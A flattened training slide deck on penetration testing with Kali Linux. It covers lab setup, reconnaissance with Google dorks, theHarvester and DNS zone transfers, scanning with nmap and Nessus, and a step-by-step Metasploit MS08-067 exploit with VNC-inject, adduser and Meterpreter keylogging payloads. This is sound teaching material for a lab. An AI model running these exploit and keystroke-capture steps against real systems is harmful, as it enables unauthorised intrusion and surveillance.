Network Security-Penetration Testing Using Kali Linux

PowerPoint Presentation

Network Security: Penetration Testing Using KALI LINUX1Mr. Marlon I. TayagMIS DirectorCISCO LMCCCNA, CCAINC-II / NC-IVComptia NCP+Fluke CTTAApple and Android DeveloperTRAINING DESCRIPTIONThis training is targeted toward Information Technology (IT) professional who has networking and administrative skills in TCP/IP networks and familiarity with Windows and basic Linux commands, and who wants to learn foundational knowledge in network security topics by means of using penetration testing methodology using KALI Linux in a controlled laboratory environment

3How Security Evolved

4What is Network Security?Consists of the provisions and policies adopted by a network administrator to prevent and monitor unauthorized access, misuse, modification, or denial of a computer network and network-accessible resources. Network security involves the authorization of access to data in a network, which is controlled by the network administrator. 5Why do we need security?Protect vital information while still allowing access to those who need itTrade secrets, medical records, etc.Provide authentication and access control for resources

Guarantee availability of resourcesEx: 5 9s (99.999% reliability)6Security FactsTwo fundamental security facts:

All complex software programs have flaw/bugs

The extraordinarily difficult to build hardware/software not vulnerable to attack7Who is vulnerable?Financial institutions and banksInternet service providersPharmaceutical companiesGovernment and defense agenciesContractors to various government agenciesMultinational corporationsANYONE ON THE NETWORK8Who are the Attackers?Elite hackersCharacterized by technical expertise and dogged persistence, not just a bag of toolsVirus writers and releasersScript kiddies: limited but numerousCriminals are growing rapidlyEmployees, Consultants, and ContractorsCyberterrorism and Cyberwar9The challenge... because its there!EgoEspionageIdeologyMischiefMoney (extortion or theft)RevengeMotivation for Hackers:105 Categories of HackersWhite-HatGray-HatBlack-HatScript-KiddieHacktivist

11Hackers are EverywhereStealing dataIndustrial EspionageIdentity theftDefamationDeleting data for funA lot of bored 16 year olds late at nightTurning computers into zombiesTo commit crimesTake down networksDistribute pornHarass someone

Mafia Boy

12Philker Hackers, responsible for the attacks on the PNRI, FDA and OVP websites.

Hacking Group

13Onel de Guzman, the Philippine dropout who, in August 2000, created and unleashed a remarkably dangerous computer virus called I LOVE YOU, cost several companies, governments, and citizens billions of US dollars in damages. In August of the same year, charges against him in our country were dismissed, mainly because we had not yet passed legislation addressing the crimes he had committed. The public around the world is justifiably outraged.

The Case of the I Love You Virus14Types AttacksClassify as passive or active

Passive attacks are eavesdroppingRelease of message contentsTraffic analysisAre hard to detect so aim to prevent

Active attacks modify/fake dataMasqueradeReplayModificationDenial of service15Goals of SecurityPreventionPrevent attackers from violating security policyDetectionDetect attackers violation of security policyRecoveryStop attack, assess and repair damageContinue to function correctly even if attack succeeds16 To protect yourself you have to know how you enemies think. What is Penetration TestingPenetration testing is the legal and authorized attempt to exploit a computer system with the intent of making a network or system more secure. The process includes scanning systems looking for weak spots, andlaunching attacks and prove that the system is vulnerable to attack from a real hacker.Penetration TestingTakes and identified port, associated service which contains vulnerabilities

Uses an exploit to gain unauthorized access to the target system

Tools include Metasploit, CANVAS, & Core IMPACTWhy Hack YourselfSecurity assessments help organizations to:

Understand threats for better defense

Determine risk to make informed IT decisions

Test incident handling procedures, intrusion detection systems, and other security implementationEthical HackingInformation GatheringSocial EngineeringPassword Cracking (remote & local)War DialingWireless (WifI, Bluetooth)VoIP, Blackberry, Smartphones, etc...THE USE AND CREATION OF A HACKING LABEvery ethical hacker must have a place to practice and explore. Most newcomers are confused about how they can learn to use hacking tools without breaking the law or attacking unauthorized targets. This is most often accomplished through the creation of a personal hacking lab. A hacking lab is a sandboxed environment where your traffic and attacks have no chance of escaping or reaching unauthorized and unintended targets. In this environment, you are free to explore all the various tools and techniques without fear that some traffic or attack will escape your network.The proper use and setup of a hacking lab is vital because one of the mosteffective means to learn something is by doing that thing. Learning and masteringthe basics of penetration testing is no different.22Hacking Lab Topology

Tools of the Trade: KALI LinuxKali Linux is a distribution based on the Debian GNU/Linux distribution aimed at digital forensics and penetration testing users maintained and funded by Offensive Security. It was developed by Offensive Security as the successor to BackTrack Linux.

the quieter you become, the more you are able to hearPC 1User: Victim1 Password: 12345DNS sub-domain name : victim1.petshop.comIP Address : 192.168.1.3 /24Intranet Service:Web Server - Apache Web ServerEmail Server Kerio Mail ServerTelnet FTP Server

PC 2User: Victim2 Password: 12345DNS sub-domain name : victim2.petshop.comIP Address : 192.168.1.3 /24Intranet Service:DNS Server Simple DNSTelnet FTP Server

Hardware:Web CamDNS Installation and ConfigurationInstall Simple DNS with zone transfer enableNote: For educational purpose our copy of SDNS need to be crack in order to runConfigure domain nameswww.petshop.comvictim1.petshop.comvictim2.petshop.commail.petshop.com - for the MX record

Note: Use Quick Records to configure web, ftp, MX domain and add new A-Record for the rest of the sub-domains

Web Server ConfigurationInstall and test Apache Web ServerFrom the work file directory copy all sample site files to htdocs folder.Test web browsing by using configured domain name.Email ConfigurationInstall Kerio Mail Server trial copyCreate the following emails (POP3) for web mail accounts, with defaults password of 12345

[email protected]@petshop.com

Note : Test email by sending emails from each accounts

FTP Server ConfigurationsInstall Filezilla FTP Server on both victim PCCreate the following accounts:PC1Username : victim1 Password:12345PC2Username : victim2 Password:1234Test FTP connections by downloading and uploading files using CLITelnet ConfigurationsActivate TELNET service on each victim PCTest Telnet connections

Procedures :Go to command promptType services.mscSearch for Telnet services and activate KALI Linux Admin AccountUser Name : root Password: toorConfigure KALI Linux IP AddressBasic Linux Console Commands

To view IP SettingsifconfigTo Configure IP Address Interfaceifconfig eth0 192.168.1.2/24Bring up an interfaceifconfig eth0 upBring down an interfaceifconfig eth0 downConfigure DHCPdhclient eth0

Basic Linux Console Commands

To configure Gateway route add default gw 192.168.1.1To configure name serverecho nameserver 8.8.8.8 > /etc/resolv.confPersistent Configuration vi /etc/network/interfaces

PHASES OF A PENETRATION TESTING

Phase 1: ReconnaissanceThis phase deals with information gathering about the target. the more information you collect on your target, the more likely you are to succeed

If I had six hours to chop down a tree, Id spend the first four of them sharpening my axe.In most cases people who attend hacking workshops or classes have a basicunderstanding of a few security tools. Typically, these students have used aport scanner to examine a system or maybe they have used Wireshark to examinenetwork traffic. Some have even played around with exploit tools likeMetasploit. Unfortunately, most beginners do not understand how these toolsfit into the grand scheme of a penetration test. As a result, their knowledge isincomplete. Following a methodology ensures that you have a plan and knowwhat to do next. To stress the importance of using and following a methodology, it is often beneficialto describe a scenario that helps demonstrate both the importance ofthis step and the value of following a complete methodology when conductinga penetration test.

Reconnaissance, also known as information gathering, is arguably the mostimportant of the four phases we will discuss. The more time you spend collectinginformation on your target, the more likely you are to be successful inthe later phases. Ironically, recon is also one of the most overlooked, underutilized,and misunderstood steps in PT methodologies today.35When a site administrator attempt to add his site to Google search engine to be available for search in special term query, Google use automated spider or Google boters to crawl this site to Google cache server (find the documents, files, code pages copy all these information to Google search engine server) this cached page will contain the site name , the site URL ,the site content that match your search query and this cached page is what we see in the result page of our search and when the user click on any of these cached pages he or she will be redirected to the host server that really contain these pages.

1.1 Google Hacking

1. Error message Error message contains rich data , which can be used to gain access to the server.2. Directories browsing This makes you able to navigate inside the directories that contain the hosted website 3. File Browsing In case we have access to website directory then we are free to access to any document that founded inside this directory such as word document, excel separate sheets, access DB, WS-FTP logs, and source Code

Google hacking Result Categories:

4. Network device Such as printers, webcams, and network routers that mainly give the hacker away to control the behavior of these devices 5. Personal information gathering Search using @ symbol will return all the pages that contain email addresses in the cached content site, which allow spammers to send mail to all this mails Google hacking Result Categories:cont.Google DirectivesDirectives are keywords that enable a user to accurately extract information from the Google Index.Google Directives Hands-OnGo to Google.comType nelson bulanadi hau.edu.ph

Google DirectivesTo properly use a Google directive, you need three things:1. The name of the directive you want to use2. A colon3. The term you want to use in the directive

site:domain term(s) to search

Using Index of syntax to find sites enabled with Index browsingA webserver with Index browsing enabled means anyone can browse the webserver directories like ordinary local directories.

site:domain indexof /admin

Google being so intelligent search engine, malicious usersdont mind exploiting its ability to dig confidential and secretinformation from internet which has got restricted access. Now Ishall discuss those techniques in details how malicious user diginformation from internet using Google as a tool42Google filetype: DirectiveThe filetype: directive is use to utilize the search for specific file extensions. This is extremely useful for finding specifictypes of files on your targets website. For example, to return only hits that contain PDF documents, you would issue the following command: site:domainname filetype:pdf

1.2. Email HarvestingIt is the process of obtaining lists of email addresses using various methods for use in bulk email or other purposes usually grouped as spam.

theharvesterProgram use to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database.

Usage:root@kali:/usr/bin# theharvester -d hau.edu.ph -l 10 -b google

msfconsole The msfconsole is probably the most popular interface to the MSF. It provides an "all-in-one" centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.

Usage:Go to root consoleType msfconsoleType use gather/search_email_collectorType set domain hau.edu.phType exploit

NSLookupNetwork administration command-line tool available for many computer operating systems use for querying the Domain Name System (DNS) to obtain domain name or IP address mapping or for any other specific DNS record.

Usage:nslookup target_domainWHOISA query and response protocol that is widely used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system, but is also used for a wider range of other information. For Philippines .ph extension whois domain registrant is PH.NET

Usage:whois target_domain

NetcraftNetcraft is an Internet services company based in Bath, England. Netcraft provides web server and web hosting market-share analysis, including web server and operating system detection.

Usage:Open web browser and go to http://news.netcraft.comType the domain on the

DigReplacement for nslookup for domain information search

Usage:dig @target_ipdig @target_ip example.com t AXFR

Phase 2: ScanningIs the process of examining the activity on a network, which can include monitoring data flow as well as monitoring the functioning of network devices. Network Scanning serves to promote both the security and performance of a network. Network Scanning may also be employed from outside a network in order to identify potential network vulnerabilities. Scanning Process StepsDetermining if a system is alivePort scanning the systemScanning the system for vulnerabilitiesStep 1: Determine Target System is AliveIt is the process of determining whether a target system is turned on and capable of communicating or interacting with our machine. This step is the least reliable and we should always continue with steps 2 and 3 regardless of the outcome of this test. Regardless, it is still important to conduct this step and make note of any machines that respond as alive.Step 2: Identifying PortsIt is the process of identifying the specific ports and services running a particular host. Simply defined, ports provide a way or location for software and networks to communicate with hardware like a computer. A port is a data connection that allows a computer to exchange information with other computers, software, or devices.

Step 3: Vulnerability ScanningVulnerability scanning is the process of locating and identifying known weaknesses in the services and software running on a target machine. The discovery of known vulnerabilities on a target system can be like finding the pot of gold at the end of a rainbow. Many systems today can be exploited directly with little or no skill when a machine is discovered to have a known vulnerability.

2.1 Ping and Ping SweepsPings and ping sweeps A ping is a special type of network packet called an ICM P packet. Pings work by sending specific types of network traffic, called ICM P Echo Request packets, to a specific interface on a computer or network device. If the device (and the attached network card) that received the ping packet is turned on and not restricted from responding, the receiving machine will respond back to the originating machine with an Echo Reply packet.

Ping SweepA ping sweep is a series of pings that are automatically sent to a range of IP addresses, rather than manually entering the individual targets address.fpingA program that sends ICMP echo probes to network hosts, similar to ping, but much better performing when pinging multiple hosts.

Usage: fping -a target_ipfping -a target_ip_beginning target_ip_end >fileExample: fping -a 172.16.41.172fping -a -g 172.16.41.1 172.16.41.190 >host.txt

-a = show live host-g = specify ip rangePort ScanningThe act of systematically scanning a computer's ports. Since a port is a place where information goes into and out of a computer, port scanning identifies open doors to a computer. Port scanning has legitimate uses in managing networks, but port scanning also can be malicious in nature if someone is looking for a weakened access point to break into your computer.

Three-Way HandshakeWhen two machines on any given network want to communicate using TCP, they do so by completing the three-way handshake. When two computers want to talk, theygo through a similar process. The first computer connects to the second computer by sending a SYN packet to a specified port number. If the second computer is listening, it will respond with a SYN/ACK . When the first computer receives the SYN/ACK , it replies with an ACK packet. At this point, the two machines can communicate normally.

NmapIs a security scanner used to discover Host and services on a computer network, thus creating a "map" of the network. To accomplish its goal, Nmap sends specially crafted packets to the target host and then analyses the responses.NMAP BasicsNmap has 6 stats: open, closed, filtered, unfiltered, open|filtered, or closed|filtered.

Open This means that the port actively accepted a connection that we tried to establish with it.

Closed Means the host is up and responding but no services are running on that port, also indicates the need of a firewall

Filtered NMAP couldnt get to the port because there was some sort of firewall or routing rules in the way.

Unfiltered port is accessible but couldnt tell if it was open or closed.

Using Nmap to Perform a TCP Connect ScanThis scan is often considered the most basic and stable of all the port scans because Nmap attempts to complete the three-way handshake on each port specified in the Nmap command.

Usage:TCP Connect Scannmap sT -p- -PN 172.16.45.135TCP IP Range Scan nmap sT -p- -PN 172.16.45.1-254Host OS Discoverynmap sS P0 sV O 192.168.1.1

-s = what kind of scan to run T = type of scan-p- = scan all ports-PN = skip host discovery phase

Using Nmap to Perform UDP ScansUDP is an acronym for User Datagram Protocol. UDP is said to be connectionless because the sender simply sends packets to the receiver with no mechanism for ensuring that the packets arrive at the destination. It is important to remember that not every service utilizes TCP.

Usage:nmap sU 172.16.45.129Vulnerability ScanningA vulnerability is a weakness in the software or system configuration that can be exploited. Vulnerabilities can come in many forms but most often they are associated with missing patches.

NessusNessus is a proprietary comprehensive vulnerability scanner which is developed by Tenable Network Security. It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on the tested systems.Installing NessusTo install Nessus, you need to complete the following steps:Download the installer from www.nessus.org.Register for a key on the Nessus website by submitting your e-mail address.The Nessus crew will e-mail you a unique product key that can be used to register the product.Install the program.Create a Nessus user to access the system.Update the plug-ins.Using NessusTo run Nessus Open browser type https://kali:8834Username: admin Password: adminkaliCreate new scans and scanAfter finishing scan click results

Troubleshooting NessusNessus not running on browser , start nessus service by typing the command

service nessusd startor/etc/init.d/nessud start

Sample Vulnerability Results

Critical Issues Found On The SystemPhase 3: ExploitationExploitation is the process of gaining control over a system. This process can take many different forms but the end goal always remains the same: administrative-level access to the computer.Exploitation is the attempt to turn the target machine into a puppet that will execute your commands and do your bidding. Just to be clear, exploitation is the process of launching an exploit.Exploits are issues or bugs in the software code that allow a hacker or attacker to alter the original functionality of the software.Metasploit: Hacking Swordfish StyleThe Metasploit Project is a computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development.

In 2004, at Defcon 12, HD Moore and spoonm rocked the world when theygave a talk titled Metasploit: Hacking Like in the Movies. This presentationfocused on exploit frameworks. An exploit framework is formal structure fordeveloping and launching exploits. Frameworks assist the development processby providing organization and guidelines for how the various pieces are assembledand interact with each other.77Using MetasploitTo run MetasploitGo to root consoleType msfconsoleNote: Starting the Msfconsole takes between 10 and 30 seconds, so do not panic if nothing happens for a few moments.

To update (You can update metasploit in two ways)On the root console type msfupdate orInside msfconsole afte the msf> prompt type msfupdate

In order to use Metasploit a target must be identified, and exploit must be selected, a payload needs to be picked, and the exploit itself must be launched.79Metasploit TerminologyExploit - is a pre-packaged collection of code that gets sent to a remote system, Exploits are the weaknesses that allow the attacker to execute remote code (payloads) on the target system.

Payload - is also a small snippet of code that is used to perform some task like installing new software, creating new users, or opening backdoors to the system. These are software or functionality that installs on the target system once the exploit has been successfully executed.80Using Nessus Output To Attack System With MetasploitRecall that Nessus is a vulnerability scanner and provides us with a list of known weaknesses or missing patches. When reviewing the Nessus output, you should make notes of any findings but pay special attention to the vulnerabilities labeled as High or Critical Many High or Critical Nessus vulnerabilities, especially missing Microsoft patches, correlate directly with Metasploit exploits.Sample Vulnerability Results

Critical Issues Found On The SystemExploiting VulnerabilitiesInside msfconsole look for exploits pertaining to the vulnerabilities

msf > search ms08-067

Note: If you are encountering [!] Database not connected or cache not built, using slow search , exit msfconsole by typing exit. On the root console type service postgresql start , the return to msfconsole and do the search again

It is important to pay close attention to the exploit rank. This information providesdetails about how dependable the exploit is (how often the exploit is successful)as well as how likely the exploit is to cause instability or crashes on thetarget system.

Metasploit uses seven ratings to rank each exploit:1. Manual2. Low3. Average4. Normal5. Good6. Great7. E xcellent84Using The ExploitTo use the exploit msf > use exploit/windows/smb/ms08_067_netapiTo show payloadsmsf exploit(ms08_067_netapi) > show payloadSelect payload msf exploit(ms08_067_netapi) > set payload windows/vncinject/bind_tcp

Show options for payloads msf exploit(ms08_067_netapi) > show options

85Setting the optionsmsf exploit(ms08_067_netapi) > set rhost 192.168.138.134RHOST target IPmsf exploit(ms08_067_netapi) > set lhost 192.168.138.135LHOST local IP

Run exploit msf exploit(ms08_067_netapi) > exploitUsing The Exploit

Sample of Payloads Available for Targeting Windows Machines

Reverse_TCP vs. Bind_TCPIn a bind payload, the attacker is sending the exploit and making a connection to the target from the attacking machine. In this instance, the attacker sends the exploit to the target and the target waits passively for a connection to come in. After sending the exploit, the attackers machine then connects to the target.In a reverse payload, the attacking machine sends the exploit but forces the target machine to connect back to the attacker. In this type of attack, rather than passively waiting for an incoming connection on a specified port or service, the target machine actively makes a connection back to the attacker.

Hands-On: MetasploitAttack the using msfconsoleSelect windows/adduser for the payloadUse telnet to connect to the victim using the new user accountMeterpreter: Getting the shellThe Meta-Interpreter, or Meterpreter, is a payload available in Metasploit that gives attackers a powerful command shell that can be used to interact with their target.

Another big advantage of the Meterpreter is the fact that it runs entirely in memory and never utilizes the hard drive. This tactic provides a layer of stealth that helps it evade many anti-virus systems and confounds some forensic tools.The Meterpreter functions in a manner similar to Windows cmd.exe or the Linux/bin/sh command. Once installed on the victim machine, it allows the attackerto interact with and execute commands on the target as if the attacker were sittingat the local machine.92Using Meterpreter Payload

Hands-On: MeterpreterUse meterpreter to capture and save keystroke.Use to execute mspaint and notepad on the target machineArmitage: Point and Click HackingArmitage is a front-end for Metasploit built with ease-of-use in mind. Armitage visualizes your attack situation, recommends the right exploits, manages post-exploitation, and makes pivoting easy to use

Using ArmitageAt the root console type armitageOn the Connect dialog box click connect

Click YES to start Metasploit RPC Server and wait .

To scan host, on the Host menu select MSF scan. Enter specific IP address or network range (ex: 192.168.1.0/24)Target Machine will appear with corresponding IP address and OS informationTo attack specific machine. Click or select machine and on the Attacks menu select Find Attacks. All possible exploit will be queried against the target machineTo implement exploit, right-click target machine and select exploit to deploy

Using ArmitageARP Poisoning: Man in the Middle Attack